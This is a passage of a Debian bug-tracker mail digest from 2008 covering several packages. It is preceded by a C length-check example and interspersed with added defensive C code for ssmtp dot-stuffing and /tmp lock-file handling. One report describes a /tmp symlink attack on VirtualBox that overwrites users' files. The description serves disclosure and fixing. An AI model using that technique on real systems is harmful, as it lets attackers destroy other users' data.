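/* The pre-patch condition quoted in the diff: only the description length
 * is compared with the bytes remaining; the header is not counted. */
static int old_check(size_t remaining, unsigned char descr_len)
{
    return descr_len < remaining;
}

/* Build a constructed test record whose length byte may disagree with the
 * text that actually follows. Returns the number of bytes really written. */
static size_t build_record(unsigned char *buf, unsigned char claimed_len,
                           const char *text)
{
    size_t text_len = strlen(text);

    memset(buf, 0, HDR_SIZE);
    buf[HDR_SIZE] = claimed_len;
    memcpy(buf + HDR_SIZE + 1, text, text_len);
    return HDR_SIZE + 1 + text_len;
}

/* Strict parser: returns a malloc'd, NUL-terminated copy of the description
 * and sets *consumed, or returns NULL if the record does not fit entirely
 * inside the `remaining` bytes. */
static char *parse_descr(const unsigned char *rec, size_t remaining,
                         size_t *consumed)
{
    size_t descr_len;
    char *out;

    if (remaining < HDR_SIZE + 1)          /* length byte must be in range */
        return NULL;
    descr_len = rec[HDR_SIZE];
    if (descr_len > remaining - HDR_SIZE - 1)  /* subtraction cannot wrap */
        return NULL;
    out = malloc(descr_len + 1);
    if (out == NULL)
        return NULL;
    memcpy(out, rec + HDR_SIZE + 1, descr_len);
    out[descr_len] = '\0';
    *consumed = HDR_SIZE + 1 + descr_len;
    return out;
}

int main(void)
{
    unsigned char buf[64];
    size_t used = 0;
    size_t n = build_record(buf, 12, "away");  /* claims 12, carries 4 */
    char *d = parse_descr(buf, n, &used);

    printf("received=%zu needed=%zu old_check=%d strict=%s\n",
           n, bytes_needed(12), old_check(n, 12), d ? d : "rejected");
    free(d);
    return 0;
}
```

The bound is written as a subtraction from `remaining` after the minimum size has been established, so the comparison cannot overflow for any length value.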
--- Begin Message ---
Source: kadu
Source-Version: 0.6.0.2-3

We believe that the bug you reported is fixed in the latest version of
kadu, which is due to be installed in the Debian FTP archive:

kadu-common_0.6.0.2-3_all.deb
  to pool/main/k/kadu/kadu-common_0.6.0.2-3_all.deb
kadu-dev_0.6.0.2-3_all.deb
  to pool/main/k/kadu/kadu-dev_0.6.0.2-3_all.deb
kadu-external-modules_0.6.0.2-3_amd64.deb
  to pool/main/k/kadu/kadu-external-modules_0.6.0.2-3_amd64.deb
kadu-gtk-modules_0.6.0.2-3_amd64.deb
  to pool/main/k/kadu/kadu-gtk-modules_0.6.0.2-3_amd64.deb
kadu-kde-modules_0.6.0.2-3_amd64.deb
  to pool/main/k/kadu/kadu-kde-modules_0.6.0.2-3_amd64.deb
kadu-themes_0.6.0.2-3_all.deb
  to pool/main/k/kadu/kadu-themes_0.6.0.2-3_all.deb
kadu_0.6.0.2-3.diff.gz
  to pool/main/k/kadu/kadu_0.6.0.2-3.diff.gz
kadu_0.6.0.2-3.dsc
  to pool/main/k/kadu/kadu_0.6.0.2-3.dsc
kadu_0.6.0.2-3_amd64.deb
  to pool/main/k/kadu/kadu_0.6.0.2-3_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Patryk Cisek <[EMAIL PROTECTED]> (supplier of updated kadu package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.8
Date: Tue, 04 Nov 2008 15:37:05 +0100
Source: kadu
Binary: kadu kadu-common kadu-dev kadu-external-modules kadu-gtk-modules 
kadu-kde-modules kadu-themes
Architecture: source all amd64
Version: 0.6.0.2-3
Distribution: unstable
Urgency: high
Maintainer: Patryk Cisek <[EMAIL PROTECTED]>
Changed-By: Patryk Cisek <[EMAIL PROTECTED]>
Description: 
 kadu

Bug#504279: Wodering..

2008-11-05 Thread Romain Beauxis
Hi !

After some discussion with upstream, it appears that the issue cannot be fixed 
for the version currently in testing.

I now have two alternatives:
 * Ask for a removal of the package
 * Explicitly mark jbidwatcher as "US only".

What do users think about these two alternatives ?

Romain






Bug#503712: etch->lenny upgrade left the system in broken state

2008-11-05 Thread Niko Tyni
On Tue, Nov 04, 2008 at 10:03:54PM +0100, Jonas Smedegaard wrote:

> I also only see three packages depending. I did not check all 
> architectures, however. And more importantly, I did not check 
> build-depends!

Right, I didn't think of those, and the large number of them does
complicate things. I'd expect them not to require the X11 driver, but
that's just a guess and not even a particularly educated one.

If this avenue is still worth looking at, an adequate semi-automatic
check might be to verify that the corresponding packages do build 
without ghostscript-x, and that the resulting packages are similar
enough to those in the archive.

I agree it's very late in the release process for this.

> Any hint on looking up reverse build-dependencies somehow?

I use grep-dctrl for things like this.

> > While it would certainly be good to fix this in a point release, we 
> > haven't required upgrading through point releases in the past AFAIK, 
> > and I think anyone would have a hard time pushing for that now.
> 
> I believe we did so for Linux kernels for Sarge (due to 2.4.x -> 2.6.x
> transition for many archs and problems switching from initrd-tools to 
> either initramfs-tools or yaird).
> 
> And again in Etch we bumped both initramfs-tool and yaird in etchnhalf - 
> I haven't checked it out, but expect upgrade instructions to include 
> upgrading to etchnhalf before upgrading to Lenny.

OK, if that is the case, I'd be OK with a fixed gs-common.prerm in a
point release and a mention in the release notes that 'aptitude install
gs-common' is a way out of the situation.

> >> 3) Have aptitude (and, if possible, APT generally) include a hint 
> >> that gs-common should not be auto-removed by default, and add to 
> >> upgrade procedures to install newest aptitude before dist-upgrading.
> >
> > Hm, that's a novel idea.
> 
> No, not really. Already exercised for Linux kernels: Have a look on a 
> Lenny/Sid at /etc/apt/apt.conf.d/01autoremove :-)

Ah, thanks. I wasn't aware of this. I believe we already recommend
upgrading aptitude first, so that would indeed help.

> How about this approach, then: Consider this a corner case, lower to 
> some non-RC level and leave it hanging...?

As long as at least some of the mitigations mentioned above do get
implemented, I'm OK with this. Do the release folks have any opinion?
-- 
Niko Tyni   [EMAIL PROTECTED]






Bug#490893: still reproducible?

2008-11-05 Thread Yves-Alexis Perez
Is this still reproducible with the fix for #448470 which should make
portmap initscript more reliable?

Cheers,
-- 
Yves-Alexis






Bug#504511: missing dependency on libaugeas0

2008-11-05 Thread Cyril Brulebois
Guido Günther <[EMAIL PROTECTED]> (04/11/2008):
> Any plans to push this into lenny once the bug is fixed?

Well:
| [EMAIL PROTECTED]:~$ rmadison python-augeas
| python-augeas |0.2.0-1 |  unstable | source, all

So… no?

Mraw,
KiBi.




Bug#504483: iceweasel hangs when restoring bookmarks

2008-11-05 Thread Oliver-Mark Cordes

Hi!

After removing the package I was not really able to test iceweasel for 
hours but my first impression was that it is now much more stable, in fact 
no crashes so far. I told the story to another admin and he said that there 
were several complaints that this package may have caused some of the problems 
in iceweasel and was removed afterwards from lenny/sid.


Maybe it is possible to add a conflict in the package description to avoid 
future problems with older installations? I think I'm not the only one who 
has installed pango-graphite by accident or whatever, so to help these 
persons a conflict or a dummy pango-graphite package which removes the old 
"faulty" one will help.


But thanks so far for your help and please close this bug!

Cheers,
Oliver







Bug#345780: marked as done (Very long lines with dots)

2008-11-05 Thread Debian Bug Tracking System

Your message dated Wed, 05 Nov 2008 09:32:56 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#345780: fixed in ssmtp 2.62-2.1
has caused the Debian Bug report #345780,
regarding Very long lines with dots
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
345780: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=345780
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package:ssmtp
Version:2.61-2

Hi!

ssmtp does have a problem with long input lines and dots. In
standardise(), a single line is checked to not start with a dot. If it
does, a leading dot is inserted. I guess this was to not quit the DATA
transaction when talking to other MTAs.

However, very long lines (larger than ssmtp's bufsize, which is 2k) are
read in 2k blocks and *each* 2k block is checked against a leading
dot. In my case (a build robot building binutils/gcc/glibc/uclibc
sources), some lines are as long as 25k (eg. linking of all libc
files) and these contain dots. Unfortunately, one dot is on a 2k+1
boundary and thus, ssmtp dies in standardise().

It would be nice if buffer handling could either be done in a more
dynamic way, or by just reading one byte less than buffer's size.
(This would allow for adding a dot, though it would break the email's
contents, think GnuPG).

Thanks,
Jan-Benedict Glaw

-- 
Jan-Benedict Glaw   [EMAIL PROTECTED]. +49-172-7608481 _ O _
"Eine Freie Meinung in  einem Freien Kopf| Gegen Zensur | Gegen Krieg  _ _ O
 für einen Freien Staat voll Freier Bürger"  | im Internet! |   im Irak!   O O O
ret = do_actions((curr | FREE_SPEECH) & ~(NEW_COPYRIGHT_LAW | DRM | TCPA));


--- End Message ---
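The report above comes down to losing track of where a line starts once input is read in fixed-size blocks. The following C sketch is an added example, not ssmtp's code or the NMU patch: it carries the line-start state across blocks and refuses to write past the output buffer. `CHUNK`, `stuff_chunk` and `stuff_message` are hypothetical names, and the `per_chunk_reset` flag models the reported per-block check for comparison.

```c
#include <stddef.h>
#include <string.h>

#define CHUNK 8 /* constructed stand-in for the 2k read buffer in the report */

/* Dot-stuff one chunk. *line_start carries "previous byte was '\n'" across
 * chunks, so a '.' that merely falls on a chunk boundary is left alone.
 * Returns bytes written, or (size_t)-1 if `out` has no room (no overrun). */
size_t stuff_chunk(int *line_start, const char *in, size_t n,
                   char *out, size_t cap)
{
    size_t o = 0;
    for (size_t i = 0; i < n; i++) {
        size_t need = (*line_start && in[i] == '.') ? 2 : 1;
        if (cap - o < need)
            return (size_t)-1;
        if (need == 2)
            out[o++] = '.';          /* SMTP transparency: double the dot */
        out[o++] = in[i];
        *line_start = (in[i] == '\n');
    }
    return o;
}

/* Run a whole message through CHUNK-sized reads. With per_chunk_reset != 0
 * every chunk is treated as a new line, modelling the reported behaviour. */
size_t stuff_message(const char *msg, char *out, size_t cap, int per_chunk_reset)
{
    size_t len = strlen(msg), o = 0;
    int line_start = 1;
    for (size_t off = 0; off < len; off += CHUNK) {
        size_t n = len - off < CHUNK ? len - off : CHUNK;
        if (per_chunk_reset)
            line_start = 1;
        size_t w = stuff_chunk(&line_start, msg + off, n, out + o, cap - o);
        if (w == (size_t)-1)
            return (size_t)-1;
        o += w;
    }
    if (o >= cap)
        return (size_t)-1;           /* no room for the terminator */
    out[o] = '\0';
    return o;
}
```

With the constructed input `"abcdefgh.ijk\n.lmn\n"` the dot at offset 8 sits on a chunk boundary: the stateful version leaves it alone and doubles only the dot after the newline, while the per-chunk model doubles both and corrupts the body.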
--- Begin Message ---
Source: ssmtp
Source-Version: 2.62-2.1

We believe that the bug you reported is fixed in the latest version of
ssmtp, which is due to be installed in the Debian FTP archive:

ssmtp_2.62-2.1.diff.gz
  to pool/main/s/ssmtp/ssmtp_2.62-2.1.diff.gz
ssmtp_2.62-2.1.dsc
  to pool/main/s/ssmtp/ssmtp_2.62-2.1.dsc
ssmtp_2.62-2.1_i386.deb
  to pool/main/s/ssmtp/ssmtp_2.62-2.1_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Kari Pahula <[EMAIL PROTECTED]> (supplier of updated ssmtp package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.8
Date: Tue, 04 Nov 2008 15:11:15 +0200
Source: ssmtp
Binary: ssmtp
Architecture: source i386
Version: 2.62-2.1
Distribution: unstable
Urgency: low
Maintainer: Anibal Monsalve Salazar <[EMAIL PROTECTED]>
Changed-By: Kari Pahula <[EMAIL PROTECTED]>
Description: 
 ssmtp  - extremely simple MTA to get mail off the system to a mail hub
Closes: 345780
Changes: 
 ssmtp (2.62-2.1) unstable; urgency=low
 .
   * NMU.
   * Only double leading dots at line start and don't overexpand buffer in
 standardise().  Don't add extra "\r\n" endings in between lines over
 BUF_SZ bytes long. Closes: #345780


--- End Message ---


Bug#504149: [Pkg-virtualbox-devel] Bug#504149: virtualbox-ose: symlink vulnerability due to bad /tmp handling

2008-11-05 Thread Frank Mehnert
Paul et al.,

On Saturday 01 November 2008, Paul Wise wrote:
> By creating a symlink /tmp/.vbox-$USER-ipc/lock an attacker can
> overwrite any file owned by any user who starts virtualbox. Starting and
> then exiting virtualbox is enough to trigger this, you don't need to
> start any virtual machines.

Thanks for this report.

> In addition to this, it is a really stupid idea to put dotfiles in /tmp
> and this should be fixed too.

I'm not sure if this is stupid or not. At least the .vbox-* directories
are not the only .dotfile directories in /tmp.

> In addition to this, virtualbox does not clean up /tmp/.vbox-$USER-ipc/
> when exiting, which is just rude.

We will fix that later.

I hope our fix is sufficient. The changesets r13788, r13807, r13809,
r13810 should check the permissions. These changesets should apply
to 1.6.6 and 2.0 as well.

Kind regards,

Frank
-- 
Dr.-Ing. Frank Mehnert    Sun Microsystems    http://www.sun.com/
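One way to perform the kind of ownership and permission checks discussed in this thread for a per-user directory and lock file under /tmp, as an added C example; it is not VirtualBox's code and not the changesets named above. `open_private_dir`, `open_lock_file` and the demo path are hypothetical names chosen for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Create or reuse a per-user directory. Returns a directory fd, or -1 if the
 * path is a symlink, not a directory, owned by someone else, or accessible
 * to group/other. */
int open_private_dir(const char *path)
{
    struct stat st;
    if (mkdir(path, 0700) != 0 && errno != EEXIST)
        return -1;
    /* O_NOFOLLOW: a symlink planted at `path` makes open() fail. */
    int dfd = open(path, O_RDONLY | O_DIRECTORY | O_NOFOLLOW | O_CLOEXEC);
    if (dfd < 0)
        return -1;
    /* Check the object we actually opened, not the name, to avoid a race. */
    if (fstat(dfd, &st) != 0 || !S_ISDIR(st.st_mode) ||
        st.st_uid != geteuid() || (st.st_mode & 077) != 0) {
        close(dfd);
        return -1;
    }
    return dfd;
}

/* Open the lock file relative to the verified directory fd. */
int open_lock_file(int dfd, const char *name)
{
    struct stat st;
    int fd = openat(dfd, name, O_RDWR | O_CREAT | O_NOFOLLOW | O_CLOEXEC, 0600);
    if (fd < 0)
        return -1;               /* includes ELOOP when `name` is a symlink */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_uid != geteuid() || st.st_nlink != 1) {
        close(fd);
        return -1;
    }
    return fd;
}

int main(void)
{
    char dir[64];
    /* Constructed demo path, not the directory name VirtualBox uses. */
    snprintf(dir, sizeof dir, "/tmp/demo-ipc-%ld", (long)geteuid());
    int dfd = open_private_dir(dir);
    int fd = dfd < 0 ? -1 : open_lock_file(dfd, "lock");
    printf("dir fd=%d, lock fd=%d\n", dfd, fd);
    return fd < 0;
}
```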




Bug#504573: sonata: Sonata fails to start after python upgrade.

2008-11-05 Thread Francesco Apollonio
Package: sonata
Version: 1.5.2-2
Severity: grave
Justification: renders package unusable


After python upgrade to version 2.5 sonata fails to start.
I've to launch dpkg-reconfigure for all libraries used by sonata to resolve 
this problem.

-- System Information:
Debian Release: lenny/sid
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: i386 (i686)

Kernel: Linux 2.6.27-endor
Locale: LANG=it_IT.UTF-8, LC_CTYPE=it_IT.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages sonata depends on:
ii  python                2.5.2-2    An interactive high-level object-o
ii  python-central        0.6.8      register and build utility for Pyt
ii  python-dbus           0.82.4-2   simple interprocess messaging syst
ii  python-gtk2           2.12.1-6   Python bindings for the GTK+ widge
ii  python-mpd            0.2.0-2    Python MPD client library

Versions of packages sonata recommends:
ii  python-eggtrayicon    2.19.1-3   Python module to display icons in 
ii  python-elementtree    1.2.6-12   Light-weight toolkit for XML proce
ii  python-mmkeys         1.5.2-2    Multimedia key support as a PyGTK 
ii  python-tagpy          0.94.5-2   Python module for manipulating tag
ii  python-zsi            2.1~a1-2   Zolera Soap Infrastructure

sonata suggests no packages.

-- no debconf information






Bug#503298: libengine-pkcs11-openssl: engine-pkcs11-0.1.4 fails in get_pin

2008-11-05 Thread Eric Dorland
* Cyril Brulebois ([EMAIL PROTECTED]) wrote:
> tag 503298 patch
> thanks
> 
> Aron Griffis <[EMAIL PROTECTED]> (24/10/2008):
> > I reported this bug upstream over a year ago and it was finally fixed.
> 
> Thanks for having done so. Could you please grab the source package,
> apply the attached patch, build it, and confirm it works fine for you?
> I'm no such medium to check by myself.
> 
> Eric, would you like me to NMU it to fix this RC bug? If you prefer, you
> can of course scratch the NMU line, adjust the version and the trailer
> line and upload it yourself.

Thanks Cyril, I'll upload it tomorrow, no need to NMU.

> Some remarks:
>  - I included the diff w/o any patch management system to keep the
>changes minimal (I could have used quilt otherwise).
>  - I didn't use simple-patchsys.mk either, since it would have
>introduced a failure to build twice in a row, see #414305/#494254.
>  - debian/rules should be including the rules include after all other
>class includes. But since no related bug got reported, I'm not
>touching that either.
>  - I'm not bumping urgency so that it gets some bits of testing in
>unstable before having a chance to migrate.
> 
> Hope this helps.
> 
> Mraw,
> KiBi.

> diff -u engine-pkcs11-0.1.4/debian/changelog 
> engine-pkcs11-0.1.4/debian/changelog
> --- engine-pkcs11-0.1.4/debian/changelog
> +++ engine-pkcs11-0.1.4/debian/changelog
> @@ -1,3 +1,14 @@
> +engine-pkcs11 (0.1.4-1.1) unstable; urgency=low
> +
> +  * Non-maintainer upload.
> +  * Backport revision 110 (upstream ticket #11) to fix failure to ask a
> +PIN, often rendering the smartcard locked: check for mycb not being
> +NULL before trying to dereference it, in src/engine_pkcs11.c's
> +get_pin(). Thanks to Aron Griffis for both Debian and upstream bug
> +reports (Closes: #503298).
> +
> + -- Cyril Brulebois <[EMAIL PROTECTED]>  Tue, 04 Nov 2008 01:26:45 +0100
> +
>  engine-pkcs11 (0.1.4-1) unstable; urgency=low
>  
>* New upstream release.
> only in patch2:
> unchanged:
> --- engine-pkcs11-0.1.4.orig/src/engine_pkcs11.c
> +++ engine-pkcs11-0.1.4/src/engine_pkcs11.c
> @@ -105,7 +105,7 @@
>   const char *prompt_info;
>   } *mycb = callback_data;
>  
> - if (mycb->password) {
> + if (mycb != NULL && mycb->password) {
>   sc_pin = set_pin(mycb->password);
>   return sc_pin;
>   }
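Review bot: the NULL guard covers only the `mycb->password` read in `if (mycb != NULL && mycb->password)`, while the struct declared just above also carries `prompt_info` and the rest of get_pin() is outside this hunk. If `mycb->prompt_info` is used further down, that access needs the same `mycb != NULL` test, otherwise a NULL callback_data is only deferred to a later dereference. A single early `mycb == NULL` branch at the top of the function would be easier to audit than per-member guards.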




-- 
Eric Dorland <[EMAIL PROTECTED]>
ICQ: #61138586, Jabber: [EMAIL PROTECTED]


